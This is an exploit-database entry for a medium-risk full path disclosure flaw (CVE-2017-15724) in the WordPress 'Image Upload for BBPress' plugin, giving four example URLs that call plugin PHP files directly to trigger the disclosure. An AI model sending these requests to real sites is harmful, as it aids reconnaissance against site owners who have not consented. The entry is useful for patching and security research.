[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wordpress Image Upload for BBPress Plugin - Full Path Disclosure Vulnerability

Author
Thiago Sena
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-28835
Category
web applications
Date add
22-10-2017
CVE
CVE-2017-15724
Platform
php
Example:

http://localhost/website.com/wp-content/plugins/image-upload-for-bbpress/bbp-image-upload.php

https://localhost/wp-content/plugins/image-upload-for-bbpress-pro/admin/display.php

https://localhost/wp-content/plugins/image-upload-for-bbpress-pro/admin/stats.php

https://localhost/wp-content/plugins/image-upload-for-bbpress-pro/admin/limits.php

#  0day.today [2024-12-24]  #